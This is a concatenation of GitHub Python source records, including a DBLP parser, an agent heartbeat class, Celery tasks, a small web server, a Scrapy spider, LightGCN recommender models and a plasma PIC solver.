open('json/'+fileName+'Edges.json', 'w') as json_file:\n json.dump(edges, json_file)\n\n# Get data from JSON\ndef ParseJSONtoDict (filename):\n # Read JSON data into the datastore variable\n if filename:\n with open(filename, 'r') as f:\n datastore = json.load(f)\n return datastore\n\n\ndef AddToConference (key, conftype, year, tier, publauthors):\n authors = publauthors.copy()\n if key not in conferences and int(year) >= 1975:\n conferences[key] = {'key': key, 'conftype': conftype, 'year': year, 'tier': tier, 'authors': authors}\n elif key in conferences:\n conferences[key]['authors'].extend(authors)\n\n\ndef AddToInproceeds (key, crossref, conftype, year, tier, publauthors):\n authors = publauthors.copy()\n if key not in inproceeds:\n inproceeds[key] = {'key': key, 'conf':crossref, 'conftype':conftype, 'year':year, 'tier':tier, 'authors':authors}\n for author in authors:\n if author not in authorsList:\n authorsList[author] = [inproceeds[key]]\n else:\n authorsList[author].append(inproceeds[key])\n\n\n\ndef AddToData (publicationData, confType, publicationAuthors):\n conftype = confType\n tier = publicationData[\"tier\"]\n year = publicationData[\"year\"]\n confname = conferencesName[confType] + \" \" + year\n crossref = publicationData[\"crossref\"].lower()\n key = publicationData[\"key\"].lower()\n conferencekey = publicationData[\"conftype\"] + publicationData[\"year\"]\n writeBool = False\n\n if publicationData[\"publtype\"] == \"inproceedings\":\n if re.search(\"^conf/[a-z]+/[0-9]{2,4}(-[1-3])?$\", crossref):\n writeBool = True\n elif publicationData[\"publtype\"] == \"article\":\n if re.search(\"^journals/pvldb/[a-zA-Z0-9]+$\", key):\n writeBool = True\n\n if writeBool:\n publicationData.update({\"confName\": confname})\n AddToInproceeds(key, 
conferencekey, conftype, year, tier, publicationAuthors)\n AddToConference(conferencekey, conftype, year, tier, publicationAuthors)\n\n\nclass DBLPHandler(ContentHandler):\n # variables used to check publications\n currentTypeOfConf = \"\"\n currentPublicationType = \"\"\n currentTag = \"\"\n fullContent = \"\"\n listOfContent = \"\"\n isPublication = False\n\n # publication content, use for temporary storage per publication\n currPublicationAuthors = []\n currPublicationData = {\"publtype\": \"NULL\", \"conftype\": \"NULL\", \"confName\": \"NULL\", \"key\": \"NULL\", \"tier\": \"NULL\",\n \"title\": \"NULL\", \"year\": \"NULL\",\n \"booktitle\": \"NULL\", \"volume\": \"NULL\", \"journal\": \"NULL\",\n \"crossref\": \"NULL\"}\n\n def __init__ (self):\n super().__init__()\n self.csv = CSVWriter()\n self.proceedWriter, self.inproceedWriter, self.authorWriter = self.csv.OpenCSVWriter()\n\n # Call when an element starts\n def startElement (self, tag, attrs):\n if tag == \"dblp\":\n return\n if tag in publicationsType:\n self.isPublication = True\n\n self.currentPublicationType = tag\n\n if \"key\" in attrs:\n value = attrs.get(\"key\")\n valueArray = value.split('/')\n self.currentTypeOfConf = valueArray[1].lower()\n if self.currentTypeOfConf in conferencesName:\n self.currPublicationData.update({\"tier\": conferenceTier[self.currentTypeOfConf]})\n self.currPublicationData.update({\"key\": value})\n self.currPublicationData.update({\"publtype\": tag})\n self.currPublicationData.update({\"conftype\": valueArray[1].lower()})\n\n # if inside a publication\n elif self.isPublication:\n self.currentTag = tag\n\n # Call when a character is read\n def characters (self, content):\n if self.isPublication and self.currentTypeOfConf in conferencesName and self.currentTag in publicationKeys:\n self.listOfContent += content\n\n # Call when ending tag found \n def endElement (self, tag):\n if self.listOfContent != \"\":\n self.fullContent = self.listOfContent.strip().replace(\"\\n\", \"\")\n\n if self.isPublication and self.currentTypeOfConf in conferencesName and tag in publicationKeys:\n if tag == \"author\":\n self.currPublicationAuthors.append(self.fullContent)\n else:\n self.currPublicationData.update({tag: self.fullContent})\n\n self.fullContent = \"\"\n self.listOfContent = \"\"\n\n # end of publication, i.e. 
found \n if tag == self.currentPublicationType:\n if self.currentTypeOfConf in conferencesName:\n if self.currentPublicationType == \"inproceedings\" or self.currentPublicationType == \"article\":\n AddToData(self.currPublicationData, self.currentTypeOfConf, self.currPublicationAuthors)\n self.resetTemporaryVariables()\n\n # end of dblp\n if tag == \"dblp\":\n self.csv.CloseCSVWriter()\n\n # reset variables after every end of publication\n def resetTemporaryVariables (self):\n self.currPublicationAuthors = []\n self.currPublicationData = {\"publtype\": \"NULL\", \"confName\": \"NULL\", \"key\": \"NULL\", \"tier\": \"NULL\",\n \"title\": \"NULL\", \"year\": \"NULL\",\n \"booktitle\": \"NULL\", \"volume\": \"NULL\", \"journal\": \"NULL\",\n \"crossref\": \"NULL\"}\n self.isPublication = False\n self.currentTypeOfConf = \"\"\n\n\n # not used\n def WriteAsProceedings (self, conf):\n publicationTitle = self.currPublicationData[\"title\"].lower()\n if self.currentTypeOfConf == \"sigmod\":\n if re.search(\"international conference on management of data\", publicationTitle):\n if re.search(\"(workshop|tutorial)\", publicationTitle) is None:\n self.currPublicationData.update({\"confName\": conf})\n\n elif self.currentTypeOfConf in [\"vldb\", \"pvldb\"]:\n if re.search(\"international conference on very large (data bases|databases)\", publicationTitle):\n if re.search(\"(workshop|tutorial)\", publicationTitle) is None:\n self.currPublicationData.update({\"confName\": conf})\n\n elif self.currentTypeOfConf == \"kdd\":\n if re.search(\"international conference on knowledge discovery (&|and) data mining\", publicationTitle):\n if re.search(\"(workshop|tutorial)\", publicationTitle) is None:\n self.currPublicationData.update({\"confName\": conf})\n\n elif self.currentTypeOfConf == \"edbt\":\n if re.search(\"international conference on extending database technology\", publicationTitle):\n if re.search(\"(workshop|tutorial)\", publicationTitle) is None:\n self.currPublicationData.update({\"confName\": conf})\n\n elif self.currentTypeOfConf == \"icde\":\n if re.search(\"international conference on data engineering\", publicationTitle):\n if re.search(\"(workshop|tutorial)\", publicationTitle) is None:\n self.currPublicationData.update({\"confName\": conf})\n\n elif self.currentTypeOfConf == \"icdm\":\n if re.search(\"ieee(.*)international conference on data mining\", publicationTitle):\n if re.search(\"(workshop|tutorial)\", publicationTitle) is None:\n self.currPublicationData.update({\"confName\": conf})\n\n elif self.currentTypeOfConf == \"sdm\":\n if re.search(\"siam international conference on data mining\", publicationTitle):\n if re.search(\"(workshop|tutorial)\", publicationTitle) is None:\n self.currPublicationData.update({\"confName\": conf})\n\n elif self.currentTypeOfConf == \"cikm\":\n if re.search(\"conference on information and knowledge management\", publicationTitle):\n if re.search(\"(workshop|tutorial)\", publicationTitle) is None:\n self.currPublicationData.update({\"confName\": conf})\n\n # some conferencesName are divided into parts <=3, conf/dasfaa/-<1/2/3>\n elif self.currentTypeOfConf == \"dasfaa\":\n if re.search(\"database systems for advance[ds] applications\", publicationTitle):\n if re.search(\"(workshop|tutorial)\", publicationTitle) is None:\n self.currPublicationData.update({\"confName\": conf})\n\n # some conferencesName are divided into parts <=3, conf/pakdd/-<1/2/3>\n elif self.currentTypeOfConf == \"pakdd\":\n if re.search(\"knowledge discovery and data 
mining(.*)pacific-asia conference\", publicationTitle):\n if re.search(\"(workshop|tutorial)\", publicationTitle) is None:\n self.currPublicationData.update({\"confName\": conf})\n\n # some conferencesName are divided into parts <=3, conf/pkdd/-<1/2/3>\n elif self.currentTypeOfConf == \"pkdd\":\n if re.search(\n \"(machine learning and )?knowledge discovery in databases|principles of data mining and knowledge discovery\",\n publicationTitle):\n if re.search(\"(workshop|tutorial)\", publicationTitle) is None:\n self.currPublicationData.update({\"confName\": conf})\n\n # some conferencesName are divided into parts <=2, conf/dexa/-<1/2/3>\n elif self.currentTypeOfConf == \"dexa\":\n if re.search(\"database and expert systems applications\", publicationTitle):\n if re.search(\"(workshop|tutorial)\", publicationTitle) is None:\n self.currPublicationData.update({\"confName\": conf})\n\n# not used\nclass CSVWriter:\n def __init__ (self):\n self.inproceedWriter = None\n self.proceedWriter = None\n self.authorWriter = None\n self.writeInproceed = None\n self.writeAuthor = None\n self.writeProceed = None\n\n def OpenCSVWriter (self):\n with open('Inproceedings.csv', 'w', newline=\"\", encoding='utf-8') as self.writeInproceed, \\\n open('AuthorsInproceeding.csv', 'w', newline=\"\", encoding='utf-8') as self.writeAuthor, \\\n open('Proceedings.csv', 'w', newline=\"\", encoding='utf-8') as self.writeProceed:\n self.inproceedWriter = csv.DictWriter(self.writeInproceed, fieldnames=dataHeader)\n self.inproceedWriter.writeheader()\n\n self.proceedWriter = csv.DictWriter(self.writeProceed, fieldnames=dataHeader)\n self.proceedWriter.writeheader()\n\n self.authorWriter = csv.writer(self.writeAuthor)\n self.authorWriter.writerow([\"conference\", \"author\"])\n return self.inproceedWriter, self.proceedWriter, self.authorWriter\n\n def CloseCSVWriter (self):\n self.writeInproceed.close()\n self.writeAuthor.close()\n self.writeProceed.close()\n","repo_name":"Seannyyy/NetworkScienceProject1","sub_path":"Preprocessing.py","file_name":"Preprocessing.py","file_ext":"py","file_size_in_byte":16294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40542488722","text":"import logging\nimport time\n\nfrom common.common_consts import HEARTBEAT_INTERVAL\nfrom common.utils.code_utils import PeriodicCaller\nfrom infection_monkey.island_api_client import IIslandAPIClient\n\nlogger = logging.getLogger(__name__)\n\n\nclass Heart:\n def __init__(self, island_api_client: IIslandAPIClient):\n self._island_api_client = island_api_client\n self._periodic_caller = PeriodicCaller(\n self._send_heartbeats, HEARTBEAT_INTERVAL, \"AgentHeart\"\n )\n\n def start(self):\n logger.info(\"Starting the Agent's heart\")\n self._periodic_caller.start()\n\n def _send_heartbeats(self):\n self._island_api_client.send_heartbeat(time.time())\n\n def stop(self):\n logger.info(\"Stopping the Agent's heart\")\n\n # Waiting HEARTBEAT_INTERVAL is more than enough time. 
In practice, stopping\n        # self._periodic_caller should never take longer than it takes for\n        # `self._island_api_client.send_heartbeat()` to timeout.\n        self._periodic_caller.stop(timeout=HEARTBEAT_INTERVAL)\n","repo_name":"guardicore/monkey","sub_path":"monkey/infection_monkey/heart.py","file_name":"heart.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","stars":6367,"dataset":"github-code","pt":"21"}
{"seq_id":"9147143646","text":"import smtplib\nfrom email.header import Header\nfrom email.mime.text import MIMEText\n\nfrom celery import Celery\nfrom celery.schedules import crontab\nfrom flask_mail import Mail, Message\n\nfrom webapp import create_app\nimport price_parsers\nfrom webapp.config import SENDER, SUBJ_FOR_EMAIL\n\nflask_app = create_app()\ncelery_app = Celery('tasks', broker='redis://localhost:6379/0')\nmail = Mail(flask_app)\n\n\n@celery_app.on_after_configure.connect\ndef setup_tasks(sender, **kwargs):\n    sender.add_periodic_task(crontab(minute=0, hour='*/5'), update_prices_megafon.s())\n    sender.add_periodic_task(crontab(minute=0, hour='*/5'), update_prices_eldorado.s())\n    sender.add_periodic_task(crontab(minute=0, hour='*/5'), update_prices_techport.s())\n    sender.add_periodic_task(crontab(minute=0, hour='*/5'), update_prices_citilink.s())\n    sender.add_periodic_task(crontab(minute=0, hour='*/5'), update_prices_mts.s())\n\n\n@celery_app.task\ndef update_prices_megafon():\n    with flask_app.app_context():\n        price_parsers.MegafonParser().update_db()\n\n\n@celery_app.task\ndef update_prices_eldorado():\n    with flask_app.app_context():\n        price_parsers.EldoradoParser().update_db()\n\n\n@celery_app.task\ndef update_prices_techport():\n    with flask_app.app_context():\n        price_parsers.TechportParser().update_db()\n\n\n@celery_app.task\ndef update_prices_citilink():\n    with flask_app.app_context():\n        price_parsers.CitilinkParser().update_db()\n\n\n@celery_app.task\ndef update_prices_mts():\n    with flask_app.app_context():\n        price_parsers.MtsParser().update_db()\n\n\n@celery_app.task\ndef send_mail(email, phone_name):\n    with flask_app.app_context():\n        msg = Message(subject=SUBJ_FOR_EMAIL, recipients=[email], sender=SENDER)\n        msg.body = f'Цена на {phone_name} из Вашего избранного снизилась!'\n        mail.send(msg)\n\n","repo_name":"borshchevsky/stuff_finder","sub_path":"tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":1867,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"7694484384","text":"from MicroWebSrv2 import *\nfrom graphPlot import plotAndSaveGraph\nfrom graph import Graph\n\nclass CustomServer(MicroWebSrv2):\n    def __init__(self, database: Graph):\n        super().__init__()\n        self.AllowAllOrigins=True # allow requests from any endpoint\n        self.CORSAllowAll = True # allow resource (data) exchange without a security protocol\n        self.BindAddress = ('localhost', 3000) # set the port where the backend will be available\n        self.database = database\n        self.shouldClearPlot = False\n\n    def start(self):\n        self.StartManaged() \n\n    def stop(self,):\n        self.Stop() \n\n    # Register a user/company\n    @WebRoute(POST, '/signup', name=\"signup\")\n    def Signup(self, request):\n        newEntity = request.GetPostedJSONObject()\n        self.database.addNode(newEntity)\n        request.Response.ReturnOk()\n\n    # Log in a user/company\n    @WebRoute(POST, '/login', name=\"login\")\n    def Login(self, request):\n        body = request.GetPostedJSONObject()\n        email = body['email']\n        password = body['password']\n\n        user = 
self.database.getNodeByEmail(email)\n\n        if not user:\n            return request.Response.ReturnBadRequest()\n\n        if user.value['password'] != password:\n            return request.Response.ReturnUnauthorized('Invalid information')\n        \n        userCopy = user.copy()\n        userCopy[\"id\"] = user.getId()\n        request.Response.ReturnOkJSON(userCopy)\n    \n    # Load the nodes related to the user with id <userid>\n    @WebRoute(GET, '/relations/<userid>', name=\"relations\")\n    def LoadRelations(self, request, args):\n        userId = args['userid']\n        user = self.database.getNode(userId)\n\n        if user:\n            relations = self.database.getNodeRelationsNodes(userId, user.getConnections()[0])\n            return request.Response.ReturnOkJSON({ 'relations': relations })\n        \n        request.Response.ReturnBadRequest()\n    \n    # Load ALL the entities via breadth-first search\n    # The user with id <userid> is the root of the search\n    @WebRoute(GET, '/entities/<userid>', name=\"entities\")\n    def LoadEntities(self, request, args):\n        params = request.QueryParams\n        \n        userId = args['userid']\n        search = params['search']\n        searchKey = params['searchKey']\n\n        user = self.database.getNode(userId)\n        \n        if user:\n            searchResults = self.database.wideSearch(userId, search, searchKey)\n            request.Response.ReturnOkJSON({ 'entities': searchResults })\n        \n        request.Response.ReturnBadRequest()\n\n    # Build and return the graph (.png), with or without focus on the user\n    @WebRoute(GET, '/graph/<userid>', name=\"graph\")\n    def CreateGraph(self, request, args):\n        userId = args['userid']\n\n        self.shouldClearPlot = plotAndSaveGraph(self.database, userId)\n        return request.Response.ReturnFile('./files/graph.jpg')\n\n    # Add/delete relation x for the user with id userid\n    @WebRoute(PUT, '/relation/<userid>', name=\"add_remove_relation\")\n    def EditRelation(self, request, args):\n        body = request.GetPostedJSONObject()\n        userId = args['userid']\n        entityId = body['entityId']\n        relationType = body['relationType']\n        operation = body['operation']\n\n        if operation == 'create':\n            self.database.addEdge(userId, entityId, relationType)\n            return request.Response.ReturnOk()\n\n        elif operation == 'delete':\n            self.database.removeEdge(userId, entityId, relationType)\n            return request.Response.ReturnOk()\n\n        request.Response.ReturnBadRequest()\n","repo_name":"Joao-mello-ferrari/network","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22006971006","text":"def head(stream: \"file\", n: int = 10) -> bytes:\n    \"\"\"Output the first part of the file.\n\n    This function behaves like the Unix `head` command, but not all options have been\n    implemented.\n\n    Args:\n        stream: File stream.\n\n        n: Number of lines to output\n\n    Return:\n        The first part of the file.\n    \"\"\"\n    lines = []\n    while n > 0:\n        buf = stream.readline()\n        if buf == b\"\":\n            break\n        lines.append(buf)\n        n -= 1\n\n    return b\"\".join(lines)\n","repo_name":"okomestudio/pyaides","sub_path":"src/pyaides/files/head.py","file_name":"head.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6188606416","text":"import pytest\n\nfrom task import solve_task1, solve_task2\n\n\n@pytest.mark.parametrize(\"file_name, result\",\n                         [(\"day_16/small_input.txt\", 71)])\ndef test_task1(file_name, result):\n    r = solve_task1(file_name)\n    assert r == result, f\"{file_name} failed. 
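The pyaides `head()` helper in the record above reads at most `n` lines from a binary stream, stopping early at EOF. A self-contained usage sketch with an in-memory stream (the sample bytes are made up):

```python
import io

def head(stream, n=10):
    # same logic as the record's head(): stop at EOF or after n lines
    lines = []
    while n > 0:
        buf = stream.readline()
        if buf == b"":
            break
        lines.append(buf)
        n -= 1
    return b"".join(lines)

stream = io.BytesIO(b"line1\nline2\nline3\n")
print(head(stream, n=2))  # b'line1\nline2\n'
```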
It returned with {r} instead of {result}.\"\n\n@pytest.mark.parametrize(\"file_name, result, key_word\",\n                         [(\"day_16/small_input.txt\", 14, \"seat\"),\n                          (\"day_16/small_input2.txt\", 12, \"class\")])\ndef test_task2(file_name, result, key_word):\n    r = solve_task2(file_name, key_word)\n    assert r == result, f\"{file_name} failed. It returned with {r} instead of {result}.\"\n","repo_name":"fuszti/advent_of_code_2020","sub_path":"day_16/test_units.py","file_name":"test_units.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25738504040","text":"from django.urls import path, include\nfrom Orders import views\n\napp_name = 'Orders'\n\nurlpatterns = [\n    path('wcreate/', views.WorderCreateView.as_view(), name='CreateWorder'),\n    path('wdelete/<int:pk>/', views.deleteWorder, name='DeleteWorder'),\n    path('tcreate/', views.TorderCreateView.as_view(), name='CreateTorder'),\n    path('tdelete/<int:pk>/', views.deleteTorder, name='DeleteTorder'),\n    path('acreate/', views.AorderCreateView.as_view(), name='CreateAorder'),\n    path('adelete/<int:pk>/', views.deleteAorder, name='DeleteAorder'),\n    path('', views.OrderIndexView.as_view(), name='index'),\n\n    path('worderadmin/', views.WorderAdmin.as_view(), name='worderadmin'),\n    path('worderadmin_approve/<int:pk>/', views.approveWorder, name='ApproveWorder'),\n    path('worderadmin_disapprove/<int:pk>/', views.disapproveWorder, name='disApproveWorder'),\n    path('worderadmin_collect/<int:pk>/', views.collectWorder, name='CollectWorder'),\n    path('worderadmin_return/<int:pk>/', views.returnWorder, name='ReturnWorder'),\n\n    path('torderadmin/', views.TorderAdmin.as_view(), name='torderadmin'),\n    path('torderadmin_approve/<int:pk>/', views.approveTorder, name='ApproveTorder'),\n    path('torderadmin_disapprove/<int:pk>/', views.disapproveTorder, name='disApproveTorder'),\n    path('torderadmin_collect/<int:pk>/', views.collectTorder, name='CollectTorder'),\n    path('torderadmin_return/<int:pk>/', views.returnTorder, name='ReturnTorder'),\n\n    path('aorderadmin/', views.AorderAdmin.as_view(), name='aorderadmin'),\n    path('aorderadmin_approve/<int:pk>/', views.approveAorder, name='ApproveAorder'),\n    path('aorderadmin_disapprove/<int:pk>/', views.disapproveAorder, name='disApproveAorder'),\n\n    path('worderadmin_comment/<int:pk>/', views.CommentWorder.as_view(), name='CommentWorder'),\n\n]","repo_name":"MajoRoth/gimel","sub_path":"Orders/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1900,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"71883926772","text":"from scrapy import Selector, Request, FormRequest\nfrom scrapy.spiders import Spider\n\nfrom xiecheng.items import SightItem\n\n\nclass Sight(Spider):\n    name = 'sight'\n    domin_url ='http://you.ctrip.com/sight/chengdu104'\n    start_urls = {\n        'http://you.ctrip.com/sight/chengdu104.html',\n    }\n    # Paginate the sight listing\n    def parse(self, response):\n        sel = Selector(response)\n        numpage = sel.xpath('//div[@class=\"ttd_pager cf\"]/div/span/b/text()').extract()[0]\n        for page in range(int(numpage) + 1):\n            yield Request(self.domin_url + '/s0-p' + str(page) + '.html#sightname',\n                          callback=self.sight_parse)\n\n    # Parse the data of each sight\n    def sight_parse(self, response):\n        sel = Selector(response)\n        sight_list = sel.xpath('//div[@class=\"list_mod2\"]')\n        for sight in sight_list:\n            item = SightItem()\n            item['img'] = sight.xpath('./div[1]/a/img/@src').extract()[0]\n            item['name'] = sight.xpath('./div[2]/dl/dt/a/text()').extract()[0]\n            item['place'] = sight.xpath('./div[2]/dl/dd[1]/text()').extract()[0]\n            
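The Orders URLconf above relies on Django path converters (restored here as `<int:pk>`, the conventional name, though the exact parameter name is an assumption since the view bodies are not part of the record). A sketch of how the converter feeds the view as a typed keyword argument; the view body is hypothetical:

```python
from django.http import HttpResponse
from django.urls import path

def deleteWorder(request, pk):
    # pk arrives as an int thanks to the <int:pk> converter
    return HttpResponse(f"would delete work order {pk}")

urlpatterns = [
    path('wdelete/<int:pk>/', deleteWorder, name='DeleteWorder'),
]
```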
item['level'] = sight.xpath('./div[2]/dl/dd[2]/text()[1]').extract()[0]\n item['price'] = sight.xpath('./div[2]/dl/dd[2]/span/span/text()').extract()\n item['rate'] = sight.xpath('./div[2]/ul/li[1]/a/strong/text()').extract()[0]\n yield item\n\n\n","repo_name":"Lqq520/projects","sub_path":"xiecheng/xiecheng/spiders/sight.py","file_name":"sight.py","file_ext":"py","file_size_in_byte":1403,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31460120586","text":"import numpy as np\nimport pandas as pd\nimport random\nimport scipy.sparse as sp\nimport tensorflow as tf\n\nfrom tensorflow.keras.utils import Progbar\n\n\nclass GraphConv(tf.keras.layers.Layer):\n def __init__(self, adj_mat, weight=True):\n super(GraphConv, self).__init__()\n self.adj_mat = adj_mat\n self.weight = weight\n\n def build(self, input_shape):\n if self.weight:\n self.W = self.add_weight('kernel',\n shape=[int(input_shape[-1]),\n int(input_shape[-1])])\n\n def call(self, ego_embeddings):\n output = tf.sparse.sparse_dense_matmul(self.adj_mat, ego_embeddings)\n if self.weight:\n output = tf.transpose(tf.matmul(self.W, output, transpose_a=False, transpose_b=True))\n return output\n\n\nclass LightGCN(tf.keras.Model):\n def __init__(self, adj_mat, n_users, n_items, n_layers=3, emb_dim=64):\n super(LightGCN, self).__init__()\n self.adj_mat = adj_mat\n self.R = tf.sparse.to_dense(adj_mat)[:n_users, n_users:]\n self.n_users = n_users\n self.n_items = n_items\n self.n_layers = n_layers\n self.emb_dim = emb_dim\n\n # Initialize user and item embeddings.\n initializer = tf.keras.initializers.GlorotNormal()\n self.user_embedding = tf.Variable(\n initializer([self.n_users, self.emb_dim]), name='user_embedding'\n )\n self.item_embedding = tf.Variable(\n initializer([self.n_items, self.emb_dim]), name='item_embedding'\n )\n\n # Stack light graph convolutional layers.\n self.gcn = [GraphConv(adj_mat, weight=False) for layer in range(n_layers)]\n\n def call(self, inputs):\n user_emb, item_emb = inputs\n output_embeddings = tf.concat([user_emb, item_emb], axis=0)\n all_embeddings = [output_embeddings]\n\n # Graph convolutions.\n for i in range(0, self.n_layers):\n output_embeddings = self.gcn[i](output_embeddings)\n all_embeddings += [output_embeddings]\n\n # Compute the mean of all layers\n all_embeddings = tf.stack(all_embeddings, axis=1)\n all_embeddings = tf.reduce_mean(all_embeddings, axis=1, keepdims=False)\n\n # Split into users and items embeddings\n new_user_embeddings, new_item_embeddings = tf.split(\n all_embeddings, [self.n_users, self.n_items], axis=0\n )\n\n return new_user_embeddings, new_item_embeddings\n\n def fit(self, epochs=10, batch_size=128, optimizer=None, decay=0.0001):\n if optimizer is None:\n optimizer = tf.keras.optimizers.Adam(learning_rate=1e-3)\n\n # Keep track of which movies each user has reviewed.\n interacted = (\n pd.DataFrame(\n {\"userId_new\": np.nonzero(self.R)[0], \"movie_interacted\": np.nonzero(self.R)[1]}\n )\n .groupby(\"userId_new\")[\"movie_interacted\"]\n .apply(set)\n .reset_index()\n )\n\n # Custom training loop from scratch.\n for epoch in range(1, epochs + 1):\n print('Epoch %d/%d' % (epoch, epochs))\n n_batch = tf.math.count_nonzero(self.R).numpy() // batch_size + 1\n bar = Progbar(n_batch, stateful_metrics='training loss')\n for idx in range(1, n_batch + 1):\n # Sample batch_size number of users with positive and negative items.\n indices = range(self.n_users)\n if self.n_users < batch_size:\n users = 
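LightGCN's `call()` above propagates the stacked user/item embeddings through weightless graph convolutions and then averages all layer outputs. A tiny numpy sketch of that propagate-then-mean pattern, with toy matrices and no adjacency normalization:

```python
import numpy as np

A = np.array([[0., 1.], [1., 0.]])   # stand-in for the (normalized) adjacency
E = np.array([[1., 0.], [0., 1.]])   # initial embeddings

layers = [E]
for _ in range(3):                   # n_layers = 3, as in the record
    layers.append(A @ layers[-1])    # one light graph convolution
E_final = np.stack(layers, axis=0).mean(axis=0)
print(E_final)
```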
np.array([random.choice(indices) for _ in range(batch_size)])\n                else:\n                    users = np.array(random.sample(indices, batch_size))\n\n                def sample_neg(x):\n                    while True:\n                        neg_id = random.randint(0, self.n_items - 1)\n                        if neg_id not in x:\n                            return neg_id\n\n                # Sample a single movie for each user that the user did and did not review.\n                interact = interacted.iloc[users]\n                pos_items = interact['movie_interacted'].apply(lambda x: random.choice(list(x)))\n                neg_items = interact['movie_interacted'].apply(lambda x: sample_neg(x))\n\n                users, pos_items, neg_items = users, np.array(pos_items), np.array(neg_items)\n\n                with tf.GradientTape() as tape:\n                    # Call model with user and item embeddings.\n                    new_user_embeddings, new_item_embeddings = self(\n                        (self.user_embedding, self.item_embedding)\n                    )\n\n                    # Embeddings after convolutions.\n                    user_embeddings = tf.nn.embedding_lookup(new_user_embeddings, users)\n                    pos_item_embeddings = tf.nn.embedding_lookup(new_item_embeddings, pos_items)\n                    neg_item_embeddings = tf.nn.embedding_lookup(new_item_embeddings, neg_items)\n\n                    # Initial embeddings before convolutions.\n                    old_user_embeddings = tf.nn.embedding_lookup(\n                        self.user_embedding, users\n                    )\n                    old_pos_item_embeddings = tf.nn.embedding_lookup(\n                        self.item_embedding, pos_items\n                    )\n                    old_neg_item_embeddings = tf.nn.embedding_lookup(\n                        self.item_embedding, neg_items\n                    )\n\n                    # Calculate loss.\n                    pos_scores = tf.reduce_sum(\n                        tf.multiply(user_embeddings, pos_item_embeddings), axis=1\n                    )\n                    neg_scores = tf.reduce_sum(\n                        tf.multiply(user_embeddings, neg_item_embeddings), axis=1\n                    )\n                    regularizer = (\n                        tf.nn.l2_loss(old_user_embeddings)\n                        + tf.nn.l2_loss(old_pos_item_embeddings)\n                        + tf.nn.l2_loss(old_neg_item_embeddings)\n                    )\n                    regularizer = regularizer / batch_size\n                    mf_loss = tf.reduce_mean(tf.nn.softplus(-(pos_scores - neg_scores)))\n                    emb_loss = decay * regularizer\n                    loss = mf_loss + emb_loss\n\n                # Retrieve and apply gradients.\n                grads = tape.gradient(loss, self.trainable_weights)\n                optimizer.apply_gradients(zip(grads, self.trainable_weights))\n\n                bar.add(1, values=[('training loss', float(loss))])\n\n\n    def recommend(self, users, k):\n        # Calculate the scores.\n        new_user_embed, new_item_embed = self((self.user_embedding, self.item_embedding))\n        user_embed = tf.nn.embedding_lookup(new_user_embed, users)\n        test_scores = tf.matmul(user_embed, new_item_embed, transpose_a=False, transpose_b=True)\n        test_scores = np.array(test_scores)\n\n        # Remove movies already seen.\n        test_scores += sp.csr_matrix(self.R)[users, :] * -np.inf\n\n        # Get top movies.\n        test_user_idx = np.arange(test_scores.shape[0])[:, None]\n        top_items = np.argpartition(test_scores, -k, axis=1)[:, -k:]\n        top_scores = test_scores[test_user_idx, top_items]\n        sort_ind = np.argsort(-top_scores)\n        top_items = top_items[test_user_idx, sort_ind]\n        top_scores = top_scores[test_user_idx, sort_ind]\n        top_items, top_scores = np.array(top_items), np.array(top_scores)\n\n        # Create DataFrame with recommended movies.\n        topk_scores = pd.DataFrame(\n            {\n                'userId': np.repeat(users, top_items.shape[1]),\n                'movieId': top_items.flatten(),\n                'prediction': top_scores.flatten(),\n            }\n        )\n\n        return topk_scores\n\nclass NGCF(LightGCN):\n    def __init__(self, adj_mat, n_users, n_items, n_layers=3, emb_dim=64):\n        super(NGCF, self).__init__(adj_mat, n_users, n_items, n_layers=n_layers, emb_dim=emb_dim)\n\n        # Stack graph convolutional layers.\n        self.gcn = [GraphConv(adj_mat, weight=True) for layer in 
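The loss in `fit()` above is the BPR pairwise objective: `softplus(-(pos - neg))` is small when positive items outscore sampled negatives. A numpy sketch of the same formula; the scores are made-up numbers:

```python
import numpy as np

def bpr_loss(pos_scores, neg_scores):
    # softplus(x) = log(1 + e^x), so this matches tf.nn.softplus(-(pos - neg))
    return np.mean(np.log1p(np.exp(-(pos_scores - neg_scores))))

print(bpr_loss(np.array([2.0, 1.5]), np.array([0.5, 1.0])))  # ~0.34
```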
range(n_layers)]\n","repo_name":"sparsh-ai/reco-tut-mlh","sub_path":"code/models/GCN.py","file_name":"GCN.py","file_ext":"py","file_size_in_byte":8126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71284059252","text":"import numpy as np\nimport scipy as sp\nfrom tqdm.auto import tqdm\nimport matplotlib.animation as animation\nimport matplotlib.pyplot as plt\nfrom matplotlib.pyplot import Axes\nfrom typing import Literal\nfrom scipy import linalg\nfrom src.utils import SORsolver\n\n# 2D two-stream instability simulation by solving 2D vlasov equation solver using PIC method\nclass PICsolver:\n def __init__(\n self, \n N : int, \n N_mesh : int, \n n0:float,\n Lx : float, \n Ly : float,\n dt : float, \n tmin : float, \n tmax : float, \n gamma : float,\n vth : float,\n vb : float,\n use_animation:bool=True,\n plot_freq : int = 4, \n save_dir : str = \"./result/simulation-2D.gif\"\n ):\n \n # setup\n self.N = N # num of particles\n self.N_mesh = N_mesh # num of mesh cell\n self.n0 = n0 # average electron density\n self.Lx = Lx\n self.Ly = Ly\n self.dt = dt # time difference\n self.tmin = tmin # minimum time\n self.tmax = tmax # maximum time\n self.gamma = gamma # parameters for solving linear equation of variant form of Tri-diagonal matrix\n self.use_animation = use_animation\n self.plot_freq = plot_freq\n self.save_dir = save_dir\n \n # particle information\n self.dx = Lx / N_mesh\n self.dy = Ly / N_mesh\n \n # initialize position, velocity and 